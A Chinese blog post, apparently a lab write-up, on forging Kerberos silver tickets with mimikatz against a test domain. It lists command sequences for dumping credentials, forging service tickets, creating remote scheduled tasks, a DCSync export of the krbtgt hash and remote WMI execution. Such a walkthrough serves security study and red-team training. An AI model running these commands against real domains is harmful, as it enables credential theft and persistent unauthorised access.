域权限维持-银票

最新推荐文章于 2023-03-09 14:59:03 发布
最新推荐文章于 2023-03-09 14:59:03 发布
阅读量225 收藏
点赞数
分类专栏: 权限维持 内网蠕动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/117023120
版权

域权限维持-银票

前提

在知道目标机器的NTLM hash和域SID的基础上,可以伪造任意用户访问目标机器上的服务。其过程不会与KDC通信,因此不会再KDC上留下任何痕迹,只会在目标机器和本机留下日志。可以利用的服务如下:

服务注释服务名称
WMIHOST&PRCSS
Powershell RemoteingHOST&HTTP
WinRMHOST&HTTP
Scheduled TasksHOST
LDAP、DCSyncLDAP
Windows File Share(CIFS)CIFS
Windows Remote Server Administration ToolsRPCSS&LDAP&CIFS

白银票据伪造

  1. 需要事先导出目标机器的服务Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

在这里插入图片描述

2.获取域SID

whoami /all

在这里插入图片描述

3.白银票据伪造并且直接注入到内存

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:cifs /ptt" "exit"

/domain 域的名称
/dis 域的sid
/service 指定服务类型
/ticket(可选) 指定路径保存票据
/ptt 直接注入内存
/rc4 域控机器ntlm

利用

清除票据

mimikatz "kerberos::purge" "exit"

1.在注入目标的Windows File Share(cifs)访问票据后,可以访问目标计算机上的任何共享,包括c $共享,能够将文件拷贝到目标系统上

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:cifs /ptt" "exit"

在这里插入图片描述

2.注入目标Scheduled Tasks服务(host)访问票据后,可以在目标机器上创建计划任务

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:host /ptt" "exit"

schtasks /create /S dc.test.com /tn "task1" /RU "system" /sc weekly /tr "c:\windows\system32\calc.exe"

在这里插入图片描述

3.在注入http和wsman服务后,可以获得目标系统上的WinRM和Powershell远程管理的权限,验证失败

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:wsman /ptt" "exit"

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:http /ptt" "exit"

在这里插入图片描述
目标机器需要开启winrm

PS:  Enable-PSRemoting

New-PSSession -Name PSC -ComputerName dc.test.com;Enter-PSSession -Name PSC

在这里插入图片描述

4.在注入ldap服务票据后,可以获得目标系统上LDAP服务的管理权限,进而可以利用dcsync远程导出域控上的hash

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:ldap /ptt" "exit"

mimikatz "lsadump::dcsync /dc:dc.test.com /domain:test.com /user:krbtgt" "exit"

在这里插入图片描述

注入host和rpcss服务的白银票据后,可以利用wmi在目标系统上执行命令,未成功

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:host /ptt" "exit"

mimikatz "kerberos::golden /user:any-user /domain:test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /target:dc.test.com /rc4:9b02237509a93de013f5aecfc5446448 /service:rpcss /ptt" "exit"

wmic /AUTHORITY:"kerberos:test.com\dc" /NODE:"dc" process call create "cmd /c calc.exe"

在这里插入图片描述

参考文章

tangsan/Silver-Tickets
https://www.cnblogs.com/hualiu0/p/5105041.html
https://pingmaoer.github.io/2020/07/13/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/

whojoe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
后渗透——权限维持之利用黄金票据与白银票据获取权限
爱国小白帽
04-03 5769
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理 权限维持 黄金票据 ms14068的漏洞原理是伪造管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 黄金票据的条件要求: 1.名称...
Windows认证机制详解
Canterlot的博客
09-04 2607
windows各种认证机制详解,包括本地认证、ntlm认证、Kerberos认证、token令牌、SPN与Kerberoast等
相关基础知识
天在等我,菜鸟想飞
12-30 7554
基础知识 工作组(Work Group) 工作组是局网中的一个概念,由许多在同一物理地点,而且被相同的局网连接起来的用户组成的小组,也可以是遍布一个机构的,但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,加入工作组是为了区分用户计算机在网络中的类别,如果用户有工作组的话,在管理上会方便很多,可以共享/使用打印机和协和工作,很多小企业都是用这种方法来管理电脑,共享文件。 工作组环境中的登录验证过程:工作组网络也称为“对等式”的网
红队知识体系梳理3-攻击控制器
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-09 427
红队知识体系梳理3-攻击控制器
赋予内普通用户dcsync权限来变向权限维持
热门推荐
Shanfenglan's blog
12-25 4万+
文章目录前言利用过程防御方法 前言 DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE: DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 DS-Replication-Get-Changes-In-Filtered-S
渗透完全技巧.pdf
10-03
5. **权限维持**:一旦获取了权限,攻击者会部署后门,如利用信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还会使用各种技巧,如组策略Hook、PasswordChangeNotify、Kerberoasting后门等,...
mimikatz-2.2.0-20220919.zip
最新发布
01-06
- **sekurlsa**:处理LSA(本地安全授权)相关的操作,如提取NTLM哈希、获取金票银票等。 - **lsadump**:用于读取SAM数据库和LSA Secrets。 - **mimilib**:mimikatz的基础库,提供各种Windows API的封装,供...
kerberosGui.zip
11-08
【Kerberos渗透】是指利用Kerberos协议中的漏洞或配置错误来获取未经授权的访问权限。这种渗透测试有助于识别并修复潜在的安全弱点,防止恶意攻击者滥用Kerberos进行横向移动或提权。常见的攻击手法包括金票攻击...
Rubeus-master_Rubues_zip_
09-29
Kerberos是一种网络认证协议,广泛应用于Windows环境,它通过加密技术确保了在网络中的身份验证过程的安全性。Kerberos的核心概念包括:Ticket Granting Service (TGS)、Authentication Server (AS) 和Ticket ...
rubeus+spoolsample.zip渗透非约束性委派攻击实验
08-19
在网络安全领,特别是针对Windows环境的渗透测试中,非约束性委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
ldap首次连接很慢_可以“一键”搞定用户同步的LDAP是什么?
weixin_39911567的博客
12-03 801
前情提要公司有很多IT系统,例如:企业邮箱、github、jenkins、grafna、zabbix、vpn、HR系统、用友、金蝶、文件系统、aws、aliyun、cmdb、jira、confluence……在新员工入职时,要做的事情有这些:要根据员工的职位,确认开通IT系统的权限;在对应的IT系统中添加账户,设置密码;各种渠道通知到新员工,IT系统权限和IT系统访问地址。在老员工离职时,上面的事...
渗透-银票据和黄金票据的利用
orange777
02-23 3792
最近做了一些靶场渗透的实验,记录下一些关于白银票据和黄金票据的问题。 0x01 白银票据的利用 1 环境信息 控DC 192.168.183.130 内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的用户有管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@
渗透之(白银票据利用)
cj_Hydra's Blog
02-14 2965
前言: 上一篇文件里面,已经很详细的和大家介绍了kerberos协议认证的方式了,上次主要说的是黄金票据(伪造TGT),今天主要来和大家分析下白银票据(伪造TGS票据),稍后为大家介绍他们之间的区别。 实验步骤: 主控:windows server 2008 IP地址:192.168.107.146 内机器(Client):windows server 2008 IP地址:192.168.10...
黄金票据和白银票
weixin_45682070的博客
06-07 2682
Golden Ticket 当攻击者已经拿到控的管理权限 klist 成员主机上执行klist,即可查看缓存的票据 klist purge 清除票据 在渗透过程如果发现管理员的密码已经修改,可尝试利用krbtgt用户的历史hash来进行票据传递攻击,krbtgt用户的密码一般不会有人去修改 信息搜集 名 net time /domain ipconfig /all 伪造管理员用户名 net group "domain admins" krbtgt账号的哈希值 mimikatz.exe
控漏洞-CVE-2021-42287&42278复现
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 :god.org windows 7 192.168.52.143 机器名称:stu1 内普通用户:liukaifeng01:hongrisec@2021@ wind
渗透--银票据问题
Vdieoo的博客
10-30 1202
金票据 伪造凭据,提升内普通用户权限 以admin用户登入任意一台内主机 收集信息 命令有:net config workstation,可以看到名为:cyberpeace。 nltest /dsgetdc:名,可以看到控主机名为:scene。 以admin权限运行mimikztz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt 找...
Kerberos的白银票据详解
weixin_30532987的博客
12-26 4124
0x01白银票据(Silver Tickets)定义 白银票据(Silver Tickets)是伪造Kerberos票证授予服务(TGS)的票也称为服务票据。如下图所示,与控制器没有AS-REQ 和 AS-REP(步骤1和2),也没有TGS-REQ / TGS-REP(步骤3和4)通信。由于银票是伪造的TGS,所以没有与控制器通信。 0x02白银票据的特点 1.白银票据...
哈希传递攻击/黄金白银票
Y5neKO's blog
09-17 1837
Q&A Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的成员账户的hash值的情况下能成功;②哈希传递会受到目标系统上的UAC的限制,如果不是RID=500的内置账户则不会以完全管理员权限登录系统;③若目标系统完全禁止了所有用户的远程登录权限(包括RID为500的内置管理员),则无法进行传递。 Q2:安装补丁KB2871997后影响 A2:见文章中KB2871997补丁 -->
msf下MS17-010模块使用总结
whojoe的博客
06-20 1万+
msf下MS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章 前言 在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。 环境搭建 这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机 kali 192.168.164.155 靶机1 192.168.164.156 靶机2 192.168.164.161(丢一个360的安装包进去,等会要用) 靶机2还要开启命名管道的匿名访问 打开cmd 执行g
银票持方如何申请背书转让
07-25
银票持方可以通过以下步骤申请背书转让: 1. 准备申请材料:持票人需要准备好所需的申请材料,包括原始银票、身份证明文件(如身份证或护照)等。 2. 填写背书申请:持票人需要填写背书转让申请表格,表明自己的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值